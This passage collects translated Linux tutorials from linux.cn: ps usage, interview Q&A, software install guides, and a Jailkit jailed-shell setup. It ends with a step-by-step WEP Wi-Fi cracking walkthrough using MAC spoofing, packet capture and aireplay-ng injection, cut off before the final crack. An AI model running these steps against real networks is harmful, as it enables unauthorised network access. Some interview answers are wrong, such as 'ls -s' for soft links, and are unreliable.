www-data  1332  1328  0 09:32 ?        00:00:00 nginx: worker process
www-data  1377  1372  0 09:32 ?        00:00:00 php-fpm: pool a.localhost
www-data  1378  1372  0 09:32 ?        00:00:00 php-fpm: pool a.localhost
www-data  4524  2359  0 10:03 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  4527  2359  0 10:03 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  4528  2359  0 10:03 ?        00:00:00 /usr/sbin/apache2 -k start

3. 通过名字或者进程id显示进程

通过”-C”选项后面加上名字或者命令来搜索进程。

$ ps -C apache2
  PID TTY          TIME CMD
 2359 ?        00:00:00 apache2
 4524 ?        00:00:00 apache2
 4525 ?        00:00:00 apache2
...

要通过进程id显示进程，就使用”-p”选项，并且还可以通过逗号分隔来指定多个进程id。

$ ps -f -p 3150,7298,6544

“-C”必须提供精确的进程名，并且它并不能通过部分名字或者通配符查找。为了更灵活地搜索进程列表，通常使用grep命令。

$ ps -ef | grep apache

4. 通过cpu或者内存使用排序进程

系统管理员通常想要找出那些消耗最多内存或者CPU的进程。排序选项会基于特定的字段或者参数来排序进程列表。

可以用’–sort’指定多个字段，并用逗号分割。除此之外，字段前面还可以跟上’-‘或者’+’的前缀来相应地表示递减和递增排序。这里有很多的用于排序的选项，通过man页来获取完整的列表。

$ ps aux --sort=-pcpu,+pmem

显示前5名最耗cpu的进程。

$ ps aux --sort=-pcpu | head -5
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  2.6  0.7  51396  7644 ?        Ss   02:02   0:03 /usr/lib/systemd/systemd --switched-root --system --deserialize 23
root      1249  2.6  3.0 355800 30896 tty1     Rsl+ 02:02   0:02 /usr/bin/X -background none :0 vt01 -nolisten tcp
root       508  2.4  1.6 248488 16776 ?        Ss   02:02   0:03 /usr/bin/python /usr/sbin/firewalld --nofork
silver    1525  2.1  2.3 448568 24392 ?        S    02:03   0:01 /usr/bin/python /usr/share/system-config-printer/applet.py

5. 以树的形式显示进程层级

许多进程实际上是从同一个父进程fork出来的，了解父子关系通常是很有用的。”–forest” 选项会构造一个ascii艺术形式的进程层级视图。

下面的命令会用apache2的进程名来搜索并构造一个树来显示具体信息。

$ ps -f --forest -C apache2
UID        PID  PPID  C STIME TTY          TIME CMD
root      2359     1  0 09:32 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  4524  2359  0 10:03 ?        00:00:00  _ /usr/sbin/apache2 -k start
www-data  4525  2359  0 10:03 ?        00:00:00  _ /usr/sbin/apache2 -k start
www-data  4526  2359  0 10:03 ?        00:00:00  _ /usr/sbin/apache2 -k start
www-data  4527  2359  0 10:03 ?        00:00:00  _ /usr/sbin/apache2 -k start
www-data  4528  2359  0 10:03 ?        00:00:00  _ /usr/sbin/apache2 -k start

不要在排序中使用树状显示，因为两者都会以不同方式影响显示的顺序。

6. 显示父进程的子进程

下面一个是找出所有从apache进程fork出来的进程的例子。

$ ps -o pid,uname,comm -C apache2
  PID USER     COMMAND
 2359 root     apache2
 4524 www-data apache2
 4525 www-data apache2
 4526 www-data apache2
 4527 www-data apache2
 4528 www-data apache2

第一个属于root的进程是apache2的主进程，其他的apache进程都是从主进程fork出来的。下面的命令使用apache2主进程的pid列出了所有的apache2的子进程。

$ ps --ppid 2359
  PID TTY          TIME CMD
 4524 ?        00:00:00 apache2
 4525 ?        00:00:00 apache2
 4526 ?        00:00:00 apache2
 4527 ?        00:00:00 apache2
 4528 ?        00:00:00 apache2

7. 显示进程的线程

“-L”选项会随着进程一起显示线程。它可用于显示所有指定进程或者所有进程的线程。

下面的命令会显示进程id为3150的进程的所有线程。

$ ps -p 3150 -L

8. 改变显示的列

ps命令可以被配置用来只显示被选中的列。很多列可以被用来显示，完整的列表可以查看man页。

下面的命令会只显示pid、用户名、cpu、内存、命令列。

$ ps -e -o pid,uname,pcpu,pmem,comm

同样可以重命名列的名字。

$ ps -e -o pid,uname=USERNAME,pcpu=CPU_USAGE,pmem,comm
  PID USERNAME CPU_USAGE %MEM COMMAND
    1 root           0.0  0.0 init
    2 root           0.0  0.0 kthreadd
    3 root           0.0  0.0 ksoftirqd/0
    4 root           0.0  0.0 kworker/0:0
    5 root           0.0  0.0 kworker/0:0H
    7 root           0.0  0.0 migration/0
    8 root           0.0  0.0 rcu_bh
    9 root           0.0  0.0 rcuob/0
   10 root           0.0  0.0 rcuob/1

非常灵活。

9. 显示进程运行的时间

运行的时间指的是，进程已经运行的时间。运行时间的列并没有默认显示，需要使用-o选项带入。

$ ps -e -o pid,comm,etime

10. 将ps转换为实时进程查看器

通常上，watch命令可将ps命令变成实时进程查看器。像这个简单的命令

$ watch -n 1 'ps -e -o pid,uname,cmd,pmem,pcpu --sort=-pmem,-pcpu | head -15'

我桌面上的输出如下。

Every 1.0s: ps -e -o pid,uname,cmd,pmem,pcpu --...  Sun Dec  1 18:16:08 2013
  PID USER     CMD                         %MEM %CPU
 3800 1000     /opt/google/chrome/chrome -  4.6  1.4
 7492 1000     /opt/google/chrome/chrome -  2.7  1.4
 3150 1000     /opt/google/chrome/chrome    2.7  2.5
 3824 1000     /opt/google/chrome/chrome -  2.6  0.6
 3936 1000     /opt/google/chrome/chrome -  2.4  1.6
 2936 1000     /usr/bin/plasma-desktop      2.3  0.2
 9666 1000     /opt/google/chrome/chrome -  2.1  0.8
 3842 1000     /opt/google/chrome/chrome -  2.1  0.8
 4739 1000     /opt/google/chrome/chrome -  1.8  1.0
 3930 1000     /opt/google/chrome/chrome -  1.7  1.0
 3911 1000     /opt/google/chrome/chrome -  1.6  0.6
 3645 1000     /opt/google/chrome/chrome -  1.5  0.4
 3677 1000     /opt/google/chrome/chrome -  1.5  0.4
 3639 1000     /opt/google/chrome/chrome -  1.4  0.4

输出会每秒刷新状态，但是这其实很top不同。你会发现top/htop命令的输出相比上面的ps命令刷新得更频繁。

这是因为top输出是结合了cup使用值和内存使用值后的排序值。但是上面的ps命令是一个更简单的行为的排序，每次获取一列(像学校的数学)，因此它不会像top那样快速更新。

via: http://www.binarytides.com/linux-ps-command/

译者：geekpi 校对：Caroline

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2358-1.html

继续我们这面试系列，在这篇文章里我们给出了10个问题。这些问题或者是在以后的文章中出现的问题不一定在面试中会被问到。然而通过这些文章我们呈现出的是一个交互的学习平台，这必将会对你有很大的帮助。

自本系列的上一篇文章11个基本的 Linux 面试问题，我们分析了不同论坛对此作出的评论，这对我们将更好的文章提供给我们的读者是很重要的。我们付出了时间和金钱，那我们又渴望从你们身上得到什么回报呢？答案是没有的。如果你不能赞扬我们的工作，但恳请不要在评论中诋毁我们的工作。

如果你在文章中没有找到什么新的东西，但也请不要忘记它对某些人却是非常有用的，并且他或她会非常感激我们的工作。我们不能够让每一篇文章都使大家高兴。但我希望读者们能够尽量理解。

Q.1：哪一条命令用于把用户登录会话记录在文件中？

• macro
• read
• script
• record
• sessionrecord

答：‘script’ 命令是用来把用户登录的会话信息记录在文件里。这条命令能够用在 shell 脚本里面，或者直接在终端中使用。下面是一个例子，它记录了开始用 script 到输入 exit 结束之间的所有东西。

如下命令记录用户登录会话到一个文件中：

[root@tecmint ~]# script my-session-record.txt
Script started, file is my-session-record.txt

记录的文件“my-session-record.txt”可以通过下述方式查看：

[root@tecmint ~]# nano my-session-record.txt
script started on Friday 22 November 2013 08:19:01 PM IST
[root@tecmint ~]# ls
^[[0m^[[01;34mBinary^[[0m ^[[01;34mDocuments^[[0m ^[[01;34mMusic^[[0m $
^[[01;34mDesktop^[[0m ^[[01;34mDownloads^[[0m my-session-record.txt ^[[01;34$

Q.2：以下那一条命令可以用来查看内核日志信息

• dmesg
• kernel
• ls -i
• uname
• 以上全不是

答：执行 ‘dmesg’ 命令可以查看内核的日志信息。在上面的命令中，kernel 不是一个有效的命令，’ls -i’ 是用来列出工作目录中文件的索引节点，而 ‘uname’ 是用来显示操作系统信息的。

–

[root@tecmint ~]# dmesg
Initializing cgroup subsys cpuset
Initializing cgroup subsys cpu
Linux version 2.6.32-279.el6.i686 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Fri Jun 22 10:59:55 UTC 2012
KERNEL supported cpus:
  Intel GenuineIntel
  AMD AuthenticAMD
  NSC Geode by NSC
  Cyrix CyrixInstead
  Centaur CentaurHauls
  Transmeta GenuineTMx86
  Transmeta TransmetaCPU
  UMC UMC UMC UMC
Disabled fast string operations
BIOS-provided physical RAM map:
...

Q.3：哪一条命令是用来显示 Linux 内核发行信息的？

• uname -v
• uname -r
• uname -m
• uname -n
• uname -o

答：‘uname -r’是用来显示内核的发行信息。其它参数‘-v’、‘-m’、‘-n’、‘o’分别显示内核版本、机器硬件名称、网络节点、主机名和操作系统。

–

[root@tecmint ~]# uname -r
2.6.32-279.el6.i686

Q.4：那一条命令是被用来识别文件类型的？

• type
• info
• file
• which
• ls

答：‘file’命令是用来识别文件类型的。其语法是‘file [选项] 文件名’。

–

[root@tecmint ~]# file wtop
wtop: POSIX shell script text executable

Q.5：哪一条命令是被用来找一条命令的二进制文件、源和手册的所在的路径？

答：‘whereis’驾到！‘whereis’命令是用来找一条命令的二进制文件、源和手册的所在的路径。

–

[root@tecmint ~]# whereis /usr/bin/ftp
ftp: /usr/bin/ftp /usr/share/man/man1/ftp.1.gz

Q.6：当用户登录时，默认情况下哪些文件会被调用作为用户配置？

答：在用户的目录下‘.profile’和‘.bashrc’会默认地被调用作为用户配置。

–

[root@tecmint ~]# ls -al
-rw-r--r--.  1 tecmint     tecmint            176 May 11  2012 .bash_profile
-rw-r--r--.  1 tecmint     tecmint            124 May 11  2012 .bashrc

Q.7：‘resolve.conf’文件是什么的配置文件？

答：‘/etc/resolve.conf’ 是 DNS 客户端的配置文件。

–

[root@tecmint ~]# cat /etc/resolv.conf
nameserver 172.16.16.94

Q.8：哪一条命令是用来创建一个文件的软链接的？

• ln
• ln -s
• link
• link -soft
• 以上都不是

答：在 Linux 环境下，‘ls -s’是被用来创建一个文件的软链接的。

–

[root@tecmint ~]# ln -s /etc/httpd/conf/httpd.conf httpd.original.conf

Q.9：在Linux下，‘pwd’命令是‘passwd’命令的别名吗？

答：不是！默认情况下‘pwd’命令不是‘passwd’命令的别名。‘pwd’是‘print working directory’（显示工作目录）的缩写，也就是输出当前的工作目录，而‘passwd’在 Linux 中是被用来更改用户的帐号密码。

–

[root@tecmint ~]# pwd
/home/tecmint
[root@tecmint ~]# passwd
Changing password for user root.
New password:
Retype new password:

Q.10：在 Linux 中，你会怎样检测 pci 设备的厂商和版本。

答：我们用的 Linux 命令是‘lspci’。

–

[root@tecmint ~]# lspci
00:00.0 Host bridge: Intel Corporation 5000P Chipset Memory Controller Hub (rev b1)
00:02.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x8 Port 2-3 (rev b1)
00:04.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x8 Port 4-5 (rev b1)
00:06.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x8 Port 6-7 (rev b1)
00:08.0 System peripheral: Intel Corporation 5000 Series Chipset DMA Engine (rev b1)
...

现在就到这里。我希望以上的问题也许对你很有用。在下星期我会再想出一些新的问题。到时请保持好的健康，继续关注我们并且与 Tecmint 保持联系喔！

via: http://www.tecmint.com/basic-linux-interview-questions-and-answers-part-ii/

译者：hyaocuk 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2369-1.html

在有关面试问题的这一系列话题的前两篇文章中，我们收到了许多好的反馈，在此表示极大的感谢，同时，我们将延续这一系列话题。在这里，我们将再次展示10个问题来进行相互学习。

• 11个基本的Linux面试问题及答案 – 第一部分
• 10个基本的Linux面试问题及答案 – 第二部分

Q.1. 你如何向你的系统中添加一个新的用户(例如，tux)？

• 使用useradd指令
• 使用adduser 指令
• 使用linuxconf指令
• 以上全是
• 以上答案全都不对

答 : 以上全是，即useradd, adduser 和 linuxconf 都可向你的linux系统添加新用户。

Q.2. 在一个硬盘上，可能有多少主分区？

• 1
• 2
• 4
• 16

答 : 一个硬盘上最多可能有4个主分区。

Q.3. Apache/Http 的默认端口号是多少？

• 8080
• 80
• 8443
• 91
• 以上答案全都不对

答 : Apache/Http默认配置是80端口

Q.4. GNU代表什么？

• GNU’s not Unix
• General Unix
• General Noble Unix
• Greek Needed Unix
• 以上答案全都不对

答 : GNU意为GNU’s not Unix.

Q.5. 如果你在shell提示符中输入mysql并得到“can’t connect to local MySQL server through socket ‘/var/mysql/mysql.sock’ ”的提示，你首先应该检查什么？

答 : 看到这条错误消息，我首先会使用service mysql status或者service mysqld status指令来检查mysql服务是否正在运行。如果mysql服务没有运行，就启动所需服务。

注意:上面的错误消息可能是由于my.cnf或者mysql的用户权限错误配置导致的。如果启动mysql服务之后仍不管用，你需要检查这两项。

Q.6. 如何将windows ntfs分区挂载到Linux上面？

答 : 首先，使用apt或者yum工具安装ntfs3g包，然后使用 “sudo mount ­t ntfs­3g /dev/ /<挂载点­>” 命令来将windows分区挂载到Linux上面

Q.7. 下面哪一个不是基于RPM的操作系统？

• RedHat Linux
• Centos
• Scientific Linux
• Debian
• Fedora

答 : ‘Debian’ 系统不是基于RPM的，其它的几个都是

Q.8. Linux中，哪一个指令用来重命名文件？

• mv
• ren
• rename
• change
• 以上答案全都不对

答 : 在Linux中，mv 指令用来重命名一个文件。例如：mv /pathtoFile/originalfilename.extension /PathtoFile/New_name.extension

Q.9. 在Linux中，哪个命令用来创建并显示文件？

• ed
• vi
• cat
• nano
• 以上答案全都不对

答 : ‘cat‘ 命令用来创建并且显示文件

10. 哪层协议用于支持用户和程序，如支持密码、资源分享、文件传输和网络管理？

• 第四层协议
• 第五层协议
• 第六层协议
• 第七层协议
• 以上答案全都不对

答案 : ‘第七层协议‘

via: http://www.tecmint.com/linux-interview-questions-and-answers-for-linux-beginners/

译者：tomatoKiller 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2371-1.html

TeamViewer，是一款热门的远程支持和桌面共享工具，并且它的Windows版、Mac OS X版和Linux版(包含Ubuntu)已经更新到版本 9 了。TeamViewer 允许你在任何地方通过网络控制任何电脑。

如果你在谈一桩生意或者帮助别人解决一些与电脑相关的问题，例如杀毒，又或者远程共享你的屏幕内容，那同样，它是一款功能强大的工具，值得拥有。

以下是这个支持工具如何使用的例子。

最近，我妈妈打电话给我说她想弄清楚如何安装一个程序。当我在电话中花了几分钟尝试帮她弄那个程序，不过都失败后，我决定自己来。

因此我们两个人都花了几分钟下载了 TeamViewer，我连接上了她的电脑并且帮她安装了那个程序。

这是一个 TeamViewer 如何帮助你解决问题的例子，如果你准备使用 TeamViewer 来帮助你的顾客或者是客户的话，你可能需要购买一个授权许可来遵守公司的政策。

我宁愿选择 TeamViewer 而不选择其它远程支持工具的另外一个原因是它允许你直接使用，无需安装，至少在 Windows 上是这样。如果你只使用一次的话，那么你只需要运行它，而它却不会占用你的磁盘空间。

现在 TeamViewer 能够在几乎所有操作系统上运行，包括 Android 和 IOS。

Windows 用户可以 从这里下载 TeamViewer

Ubuntu 用户可以 从这链接下载并运行 TeamViewer

在 Ubuntu 轻松安装 TeamViewer，运行下面的命令来下载安装程序

wget http://download.teamviewer.com/download/teamviewer_linux.deb

对于 64位操作系统, 使用下面的链接.

wget http://download.teamviewer.com/download/teamviewer_linux_x64.deb

最后，运行下面的命令来安装。

sudo dpkg -i teamviewer_linux*.deb; sudo apt-get -f install

去试试吧！

如果上述的命令不能成功运行的话，那么就去 TeamViewer 下载页面来下载.

via: http://www.liberiangeek.net/2013/12/daily-ubuntu-tips-teamviewer-9-is-available-for-download/

译者：hyaocuk 校对：Caroline

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2374-1.html

喜欢GNOME风格菜单？安装Class Menu Indicator吧。

对于那些从开始就一直关注Ubuntu操作系统的人，他们看见几乎所有的Ubuntu经历的改变。发生了许多的改变，尤其是在桌面部分。从经典的GNOME桌面环境到Unity，Ubuntu已经完全地重新设计了。

对于那些新用户，他们所知道的就是Unity桌面环境，仅仅只是听说过或者见过之前Ubuntu的原始GNOME桌面环境。

如果你是一个老资格用户，想要在Ubuntu的Unity回到GNOME风格的菜单，安装Classic Menu Indicator 可以解决这个问题。这个有趣的包被安装在顶部面板的通知区域，在Ubuntu中带回了GNOME风格菜单体验。

像经典的GNOME菜单一样，它包括所有的应用和经典菜单结构。对于曾经使用过它的人们是容易导航和开启应用。对于新用户，它也是容易掌握。

接下来的简短指导将会告诉你如何在Ubuntu中安装这个包。

马上开始，在键盘上按下 Ctrl – Alt – T 打开终端。

打开完毕后，运行下列命令，加入它的PPA文件

sudo apt-add-repository ppa:diesch/testing

接来下，运行下列命令安装它。

sudo apt-get update && sudo apt-get install classicmenu-indicator

安装完成后，在Unity Dash中启动。它叫Classic Menu Indicator。当你启动它的时候，它会自动的嵌入顶部面板，如下图。

就是这样，使用并享受吧！

via: http://www.liberiangeek.net/2013/11/daily-ubuntu-tipslike-gnome-classic-menu-get-classic-menu-indicator/

译者：Vic___ 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2376-1.html

Jailkit和jailed Shell

受限shell（Jailed Shell）是一类被限制的shell，它看起来非常像真实的Shell，但是它不允许查看和修改真实的文件系统的任何部分。Shell内的文件系统不同于底层的文件系统。这种功能是通过chroot和其他多种程序实现的。举例来说，给用户建立一个linux shell去让他“玩玩”，或者在一个限定的环境里运行一些程序的所有功能等等。

在这个教程里我们将会探讨在Ubuntu下用jailkit建立一个受限shell。Jailkit是一个让你快速建立一个受限shell的工具，将受限用户放到里面，并配置那些要在受限制环境里运行的程序。

Jailkit 从这里下载：http://olivier.sessink.nl/jailkit/

在Ubuntu/Debian 上安装 jailkit

1. 因为jaikit需要在系统上编译，首先，我们需要有用于编译的那些工具。所以，安装如下包：

   $ sudo apt-get install build-essential autoconf automake libtool flex bison debhelper binutils-gold
   

2. 从下述URL下载Jailkit，或者访问它的网站以下载最新版本的，如果有了更新版本的话。http://olivier.sessink.nl/jailkit/jailkit-2.16.tar.gz

   $ wget http://olivier.sessink.nl/jailkit/jailkit-2.16.tar.gz
   

3. 解压

   $ tar -vxzf jailkit-2.16.tar.gz
   

4. 编译并创建deb软件包

   Jailkit已经包含了用于编译成deb软件包的代码和配置，可以直接安装在Debian系的Linux上。运行下列命令来完成它。

   $ cd jailkit-2.16/
   $ sudo ./debian/rules binary
   

5. 安装deb软件包

   上述命令创建的deb软件包叫做： jailkit2.16-1amd64.deb.

   $ cd ..
   $ sudo dpkg -i jailkit_2.16-1_amd64.deb
   

   就是这样，现在Jailkit已经安装完成了。Jailkit有许多命令可以用来设置一个基于chroot的受限环境，如下是这些命令：

   $ jk_
   jk_addjailuser   jk_chrootlaunch  jk_cp            jk_jailuser      jk_lsh           jk_uchroot
   jk_check         jk_chrootsh      jk_init          jk_list          jk_socketd       jk_update
   

上述命令都有man帮助信息，如果你使用它们时，可以参考。

配置Jailed Shell

1. 配置受限环境

   我们需要建立一个目录来存放所有受限环境的配置。目录随便放在什么地方，比如我们可以创建个/opt/jail的目录。

   $ sudo mkdir /opt/jail
   

   这个目录应为Root所有。用chown改变属主。

   $ sudo chown root:root /opt/jail
   

2. 设置在受限环境中可用的程序

   任何程序想要在受限环境中执行则必须用jk_init命令拷贝到目录中。

   例如：

   $ sudo jk_init -v /jail basicshell
   $ sudo jk_init -v /jail editors
   $ sudo jk_init -v /jail extendedshell
   $ sudo jk_init -v /jail netutils
   $ sudo jk_init -v /jail ssh
   $ sudo jk_init -v /jail sftp
   $ sudo jk_init -v /jail jk_lsh
   

   或一次性解决：

   $ sudo jk_init -v /opt/jail netutils basicshell jk_lsh openvpn ssh sftp
   

   像basicshell, editors, netutils是一些组名，其中包含多个程序。复制到jail shell中的每个组都是可执行文件、库文件等的集合。比如basicshell就在jail提供有bash, ls, cat, chmod, mkdir, cp, cpio, date, dd, echo, egrep等程序。

   完整的程序列表设置，你可以在/etc/jailkit/jk_init.ini中查看。

   jk_lsh (Jailkit limited shell) – 这是一个重要的部分，必须添加到受限环境中。

3. 创建将被监禁的用户

   需要将一个用户放入jail里。可以先创建一个

   $ sudo adduser robber
   Adding user `robber' ...
   Adding new group `robber' (1005) ...
   Adding new user `robber' (1006) with group `robber' ...
   Creating home directory `/home/robber' ...
   Copying files from `/etc/skel' ...
   Enter new UNIX password:
   Retype new UNIX password:
   passwd: password updated successfully
   Changing the user information for robber
   Enter the new value, or press ENTER for the default
       Full Name []:
       Room Number []:
       Work Phone []:
       Home Phone []:
       Other []:
   Is the information correct? [Y/n] y
   

   注意:目前创建的是一个在实际文件系统中的普通用户，并没有添加到受限环境中。

   在下一步这个用户会被放到受限环境里。

   这时候如果你查看/etc/passwd文件，你会在文件最后看到跟下面差不多的一个条目。

   robber:x:1006:1005:,,,:/home/robber:/bin/bash
   

   这是我们新创建的用户，最后部分的/bin/bash指示了这个用户如果登入了那么它可以在系统上正常的Shell访问

4. 限制用户

   现在是时候将用户限制

   $ sudo jk_jailuser -m -j /opt/jail/ robber
   

   执行上列命令后，用户robber将会被限制。

   如果你现在再观察/etc/passwd文件，会发现类似下面的最后条目。

   robber:x:1006:1005:,,,:/opt/jail/./home/robber:/usr/sbin/jk_chrootsh
   

   注意:最后两部分表明用户主目录和shell类型已经被改变了。现在用户的主目录在/opt/jail(受限环境)中。用户的Shell是一个名叫jk_chrootsh的特殊程序，会提供Jailed Shell。

   jk_chrootsh这是个特殊的shell，每当用户登入系统时，它都会将用户放入受限环境中。

   到目前为止受限配置已经几乎完成了。但是如果你试图用ssh连接，那么注定会失败,像这样：

   $ ssh robber@localhost
   robber@localhost's password:
   Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-25-generic x86_64)
   * Documentation:  https://help.ubuntu.com/
   13 packages can be updated.
   0 updates are security updates.
   *** /dev/sda7 will be checked for errors at next reboot ***
   *** /dev/sda8 will be checked for errors at next reboot ***
   Last login: Sat Jun 23 12:45:13 2012 from localhost
   Connection to localhost closed.
   $
   

   连接会立马关闭，这意味着用户已经活动在一个受限制的shell中。

5. 给在jail中的用户Bash Shell

   下个重要的事情是给用户在限制环境中的一个正确的bash shell。

   打开下面的文件

   /opt/jail/etc/passwd
   

   这是个jail中的password文件。类似如下

   root:x:0:0:root:/root:/bin/bash
   robber:x:1006:1005:,,,:/home/robber:/usr/sbin/jk_lsh
   

   将/usr/sbin/jk_lsh改为/bin/bash

   root:x:0:0:root:/root:/bin/bash
   robber:x:1006:1005:,,,:/home/robber:/bin/bash
   

   保存文件并退出。

6. 登入限制环境

   现在让我们再次登入受限环境

   $ ssh robber@localhost
   robber@localhost's password:
   Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-25-generic x86_64)
    * Documentation:  https://help.ubuntu.com/
   13 packages can be updated.
   0 updates are security updates.
   *** /dev/sda7 will be checked for errors at next reboot ***
   *** /dev/sda8 will be checked for errors at next reboot ***
   Last login: Sat Jun 23 12:46:01 2012 from localhost
   bash: groups: command not found
   I have no name!@desktop:~$
   

   受限环境说’I have no name!’，哈哈。现在我们在受限环境中有了个完整功能的bash shell。

   现在看看实际的环境。受限环境中的根目录实际就是真实文件系统中的/opt/jail。但这只有我们自己知道，受限用户并不知情。

   I have no name!@desktop:~$ cd /
   I have no name!@desktop:/$ ls
   bin  dev  etc  home  lib  lib64  run  usr  var
   I have no name!@desktop:/$
   

   也只有我们通过jk_cp拷贝到jail中的命令能使用。

   如果登入失败，请检查一下/var/log/auth.log的错误信息。

   现在尝试运行一些网络命令，类似wget的命令。

   $ wget http://www.google.com/
   

   如果你获得类似的错误提示：

   $ wget http://www.google.com/
   --2012-06-23 12:56:43--  http://www.google.com/
   Resolving www.google.com (www.google.com)... failed: Name or service not known.
   wget: unable to resolve host address `www.google.com'
   

   你可以通过运行下列两条命令来解决这个问题:

   $ sudo jk_cp -v -j /opt/jail /lib/x86_64-linux-gnu/libnss_files.so.2
   $ sudo jk_cp -v -j /opt/jail /lib/x86_64-linux-gnu/libnss_dns.so.2
   

   这样才能正确的定位到libnssfiles.so和libnssdns.so

在限制环境中运行程序或服务

现在配置已经完成了。可以在限制/安全的环境里运行程序或服务。要在限制环境中启动一个程序或守护进程可以用jk_chrootlaunch命令。

$ sudo jk_chrootlaunch -j /opt/jail -u robber -x /some/command/in/jail

jk_chrootlaunch工具可以在限制环境中启动一个特殊的进程同时指定用户特权。如果守护进程启动失败，请检查/var/log/syslog/错误信息。

在限制环境中运行程序之前，该程序必须已经用jk_cp命令复制到jail中。

jk_cp -　将文件包括权限信息和库文件复制到jail的工具　

进一步阅读有关其他jailkit命令信息，可以阅读文档，http://olivier.sessink.nl/jailkit/

via: http://www.binarytides.com/install-jailkit-ubuntu-debian/

via: http://www.binarytides.com/setup-jailed-shell-jailkit-ubuntu/

译者：Luoxcat 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2379-1.html

你可能已经知道如果你想要加锁自己的WIFI无线网络，你最好选择WPA加密方式，因为WEP加密很容易被人破解。但是，你知道有多么的容易么？下面我们来看看吧。

注意：此帖是验证如何破解很少使用而陈旧的WEP加密协议。如果你希望破解的网络采用了更受欢迎的WPA加密，请看这篇：如何使用Reaver破解Wi-Fi网络的WPA密码。

今天我们来看看如何一步一步的破解采用WEP加密方法加密的WIFI网络。但是，有言在先：知识是一种力量，但是力量并不意味着你应该成为一个混球或者做任何违法的事。知道如何挑选一把锁具并不会让你成为一个贼。请将此帖用于教育性质或者概念验证性试验。

关于如何使用这个方案破解WEP加密的教程在互联网上有很多。认认真真的谷歌下，这个并不能被称作新闻。但是，让人惊讶的是如笔者一般的只有很少的网络经验的菜鸟，也可以使用一些免费的软件和廉价的WIFI适配器来完成这个做破解。下面就来看看吧！

你需要些什么

除非你是一个电脑网络安全的忍者，否则你不太可能具有完成实验的所有工具。以下是你需要的：

• 一个兼容的无线适配器.这是最主要的需求。你需要一个无线适配器，能用来完成包注入，你的电脑很可能不具备这个功能。在和我的安全专家邻居讨论了以后，我从亚马逊上花了50美元购买了一个Alfa AWUS050NH适配器，图片如上。更新：别学我，其实应该买Alfa AWUS036H而不是US050NH。视频里的哥们儿用$12美金在Ebay上买了一个解调器（同时可以选择把自己的路由器卖掉）。网上有很多可以兼容aircrack的适配器。

• 一个BackTrack Live CD. 我们已经提供了一个完整的BackTrack 3的安装使用教程，Linux Live CD可以让你完成所有的安全测试和测试工作。请自行下载一个CD镜像，然后刻录或者从VMware中启动它。

• 一个靠近的WEP加密的WIFI网络. 信号需要足够的强，理想的情况下最好有用户正在使用、连接和断开设备。越多的人使用网络，你就可以的到更多的破解数据，这样你就更可能成功。

• 使用命令行的耐心. 这里总共有10步，总共需要输入很长、很难懂的命令，然后等你的wifi网卡收集足够破解密码的数据。就像一个医生和一个急躁的病人说，要有点耐心。

破解WEP

为了破解WEP，你需要启动一个Konsole，它是BackTrack内置的命令行界面，它在任务栏的左下角，从左往右第二个图标。现在，输入命令吧。

第一步，运行下面的命令，获得你网卡列表：

airmon-ng

笔者只看见了一个ra0的结果。你的可能不一样；记录下这些内容（找个纸或者截图）。现在开始，更改替换掉命令中每一个包括(interface)的地方。

现在，运行下面的四个命令。看看截图里的输入结果。

airmon-ng stop (interface)
ifconfig (interface) down
macchanger —mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

如果你没有获得像截图一样的结果，最可能的情况就是你的无线网卡不能在特殊破解模式下工作。如果你成功了，你应该已经成功的在你的无线网卡上伪造了一个新的MAC地址，00:11:22:33:44:55.

现在，开始使用的你网络接口，运行：（译者注：interface在范例中就是ra0）

airodump-ng (interface)

就可以看见你周围的wifi网络列表了。当你认准了你的目标后，按Ctrl+C结束列表。高亮你感兴趣的网络，同时记录下两样数据：它的BSSID和它的Channel(讯道，标签为CH的那列)，就像下面的截图。很明显你想要破解的网络需要是WEP加密的，而不是WPA或者其他加密方式。

就像我说的，按Ctrl+C来终止列表。（我需要重复一两次来找到我需要的网络）一旦你找到了你需要破解的网络，高亮BSSID然后复制它到你的剪切板来为将要输入的命令做准备。

现在我们需要观察你选中的目标网络，并捕捉信息存入一个文件里，运行如下命令：

airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)

其中，(channel),(bssid)就是你之前获取的那些信息。你可以使用Shift+Insert来将剪切板中的bssid信息粘贴到命令行中。随便给你的文件取个名字。我用的是“YoYo”，我破解的网络的名字。

你能够得到如截图中的窗口输出。就这么放着这个窗口。在前台新建一个konsole窗口，输入如下命令：

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

这里的ESSID是接入点SSID的名字，例如我的就是YoYo。你希望能在运行后得到“Association successful”的结果。

你如果到了这一步，现在是时候运行下面的命令了：

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

现在，我们创建了一个路由通路来更快的抓取数据，从而加快我们的破解过程。几分钟以后，前台的窗口会开始疯狂的读写数据包。（这时，我也不能用YoYo的网络在另一台机器上上网）这里，你可以喝杯Java牌儿咖啡，然后出去走走。一般来说，你需要收集到足够的数据后再运行你的破解程序。看着“#Data”列里的数据，你需要它在10，000以上。（图里的数据只有854）

这个过程可能需要一些时间，这取决于你的网络信号强度（截图中可以看到，我的信号强度低于-32DB，虽然YoYo的AP和我的适配器在同一间屋里）。等待直到包数据到达10K，因为在此之前破解过程不会成功。实际上，你可能需要超过10K，虽然他可能是大多数情况下都足够了。

一旦你收集了足够多的数据，就是见证奇迹的时刻了。启动第三个终端窗口，同时输入下面的命令来破解你收集到的数据：

